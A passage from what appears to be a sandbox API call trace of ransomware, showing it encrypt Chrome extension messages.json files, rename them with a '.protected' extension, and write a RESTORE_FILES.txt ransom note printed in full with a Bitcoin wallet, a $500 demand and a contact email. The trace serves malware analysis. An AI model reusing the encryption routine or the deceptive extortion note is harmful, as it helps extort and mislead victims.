(lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0081.157] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0081.157] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0081.157] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0081.157] CloseHandle (hObject=0x164) returned 1 [0081.157] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0081.157] lstrcmpiW (lpString1="pt_PT", lpString2="Windows") returned -1 [0081.157] lstrcmpiW (lpString1="pt_PT", lpString2="Program Files") returned 1 [0081.157] lstrcmpiW (lpString1="pt_PT", lpString2="Program Files (x86)") returned 1 [0081.157] lstrcmpiW (lpString1="pt_PT", lpString2="$Recycle.bin") returned 1 [0081.157] lstrcmpiW (lpString1="pt_PT", lpString2="System Volume Information") returned -1 [0081.157] 
wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\pt_PT") returned 148 [0081.157] lstrcmpW (lpString1="pt_PT", lpString2=".") returned 1 [0081.158] lstrcmpW (lpString1="pt_PT", lpString2="..") returned 1 [0081.158] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\pt_PT\\*") returned 150 [0081.158] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\pt_PT\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0081.158] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0081.158] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0081.158] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0081.158] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0081.158] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0081.158] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\pt_PT\\.") returned 150 [0081.158] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0081.158] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0081.158] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0081.158] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0081.158] lstrcmpiW (lpString1="..", 
lpString2="Program Files (x86)") returned -1 [0081.158] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0081.158] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0081.158] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\pt_PT\\..") returned 151 [0081.158] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0081.158] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0081.158] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0081.158] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0081.158] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0081.158] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0081.158] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0081.158] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0081.158] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\pt_PT\\messages.json") returned 162 [0081.158] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0081.158] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0081.158] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0081.159] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0081.159] CreateFileW 
(lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\pt_PT\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\pt_pt\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0081.159] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\pt_PT\\messages.json") returned 162 [0081.159] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0081.159] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\pt_PT\\messages.json") returned 162 [0081.159] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0081.159] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\pt_PT\\messages.json") returned 162 [0081.159] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0081.159] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0x295, lpOverlapped=0x0) returned 1 [0081.161] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xfffffd6b, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0081.161] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0x295, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: 
lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0x295, lpOverlapped=0x0) returned 1 [0081.161] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0081.161] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0081.161] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0081.161] CloseHandle (hObject=0x168) returned 1 [0081.161] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\pt_PT\\messages.json.protected") returned 172 [0081.161] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\pt_PT\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\pt_pt\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\pt_PT\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\pt_pt\\messages.json.protected")) returned 1 [0081.162] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 
[0081.162] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0081.162] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\pt_PT\\RESTORE_FILES.txt") returned 166 [0081.162] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\pt_PT\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\pt_pt\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0081.163] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0081.163] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0081.164] lstrlenA (lpString="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") returned 684 [0081.164] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0081.164] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0081.164] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, 
lpOverlapped=0x0) returned 1 [0081.164] CloseHandle (hObject=0x164) returned 1 [0081.164] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0081.164] lstrcmpiW (lpString1="ro", lpString2="Windows") returned -1 [0081.164] lstrcmpiW (lpString1="ro", lpString2="Program Files") returned 1 [0081.164] lstrcmpiW (lpString1="ro", lpString2="Program Files (x86)") returned 1 [0081.165] lstrcmpiW (lpString1="ro", lpString2="$Recycle.bin") returned 1 [0081.165] lstrcmpiW (lpString1="ro", lpString2="System Volume Information") returned -1 [0081.165] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ro") returned 145 [0081.165] lstrcmpW (lpString1="ro", lpString2=".") returned 1 [0081.165] lstrcmpW (lpString1="ro", lpString2="..") returned 1 [0081.165] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ro\\*") returned 147 [0081.165] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ro\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0081.165] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0081.165] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0081.165] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0081.165] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0081.165] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0081.165] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, 
pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ro\\.") returned 147 [0081.165] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0081.165] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0081.165] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0081.165] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0081.165] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0081.165] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0081.165] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0081.165] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ro\\..") returned 148 [0081.166] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0081.166] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0081.166] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0081.166] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0081.166] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0081.166] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0081.166] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0081.166] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0081.166] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ro\\messages.json") returned 159 [0081.166] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0081.166] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0081.166] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0081.166] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0081.166] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ro\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ro\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0081.168] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ro\\messages.json") returned 159 [0081.168] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0081.168] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ro\\messages.json") returned 159 [0081.168] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0081.168] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ro\\messages.json") returned 159 [0081.168] StrStrW 
(lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0081.168] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0x29c, lpOverlapped=0x0) returned 1 [0081.169] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xfffffd64, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0081.170] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0x29c, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0x29c, lpOverlapped=0x0) returned 1 [0081.170] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0081.170] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0081.170] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0081.170] CloseHandle (hObject=0x168) returned 1 [0081.170] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ro\\messages.json.protected") returned 169 [0081.170] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ro\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user 
data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ro\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ro\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ro\\messages.json.protected")) returned 1 [0081.171] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0081.171] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0081.171] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ro\\RESTORE_FILES.txt") returned 163 [0081.171] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ro\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ro\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0081.172] lstrlenA (lpString="! 
SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0081.172] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0081.173] lstrlenA (lpString="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") returned 684 [0081.173] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 
[0081.173] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0081.173] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0081.173] CloseHandle (hObject=0x164) returned 1 [0081.173] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0081.173] lstrcmpiW (lpString1="ru", lpString2="Windows") returned -1 [0081.173] lstrcmpiW (lpString1="ru", lpString2="Program Files") returned 1 [0081.173] lstrcmpiW (lpString1="ru", lpString2="Program Files (x86)") returned 1 [0081.173] lstrcmpiW (lpString1="ru", lpString2="$Recycle.bin") returned 1 [0081.173] lstrcmpiW (lpString1="ru", lpString2="System Volume Information") returned -1 [0081.173] wnsprintfW (in: pszDest=0xcf1098, 